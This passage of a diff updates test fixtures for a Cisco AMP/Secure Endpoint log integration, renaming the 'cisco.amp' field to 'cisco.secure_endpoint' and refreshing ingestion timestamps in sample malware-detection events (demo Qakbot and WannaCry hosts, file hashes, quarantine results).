Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -1693,7 +1693,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1760,7 +1760,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929502829Z",
+                "ingested": "2021-09-27T00:42:13.513701445Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1771,7 +1771,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DD6D4FEDD3-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1839,7 +1839,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929504723Z",
+                "ingested": "2021-09-27T00:42:13.513703177Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1850,7 +1850,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DD6D4FEDD3-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1922,7 +1922,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929506709Z",
+                "ingested": "2021-09-27T00:42:13.513705053Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1933,7 +1933,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DD6D4FEDD3-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2002,7 +2002,7 @@
             },
             "event": {
                 "severity": 4,
-                "ingested": "2021-09-13T18:07:42.929508583Z",
+                "ingested": "2021-09-27T00:42:13.513706783Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T14:09:00.000Z",
@@ -2013,7 +2013,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2081,7 +2081,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929510470Z",
+                "ingested": "2021-09-27T00:42:13.513708518Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -2091,7 +2091,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2162,7 +2162,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929512347Z",
+                "ingested": "2021-09-27T00:42:13.513710300Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2173,7 +2173,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D5221F6847-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2241,7 +2241,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929514264Z",
+                "ingested": "2021-09-27T00:42:13.513712010Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2252,7 +2252,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.D5221F6847-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2314,7 +2314,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929516156Z",
+                "ingested": "2021-09-27T00:42:13.513713775Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -2324,7 +2324,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2405,7 +2405,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929518075Z",
+                "ingested": "2021-09-27T00:42:13.513715520Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2416,7 +2416,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2499,7 +2499,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929519988Z",
+                "ingested": "2021-09-27T00:42:13.513717278Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2510,7 +2510,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2588,7 +2588,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929521872Z",
+                "ingested": "2021-09-27T00:42:13.513719023Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2599,7 +2599,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.24D004A104-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2686,7 +2686,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929523775Z",
+                "ingested": "2021-09-27T00:42:13.513720786Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2697,7 +2697,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.24D004A104-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2779,7 +2779,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929525666Z",
+                "ingested": "2021-09-27T00:42:13.513722504Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2790,7 +2790,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.ED01EBFBC9-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2864,7 +2864,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929527645Z",
+                "ingested": "2021-09-27T00:42:13.513724362Z",
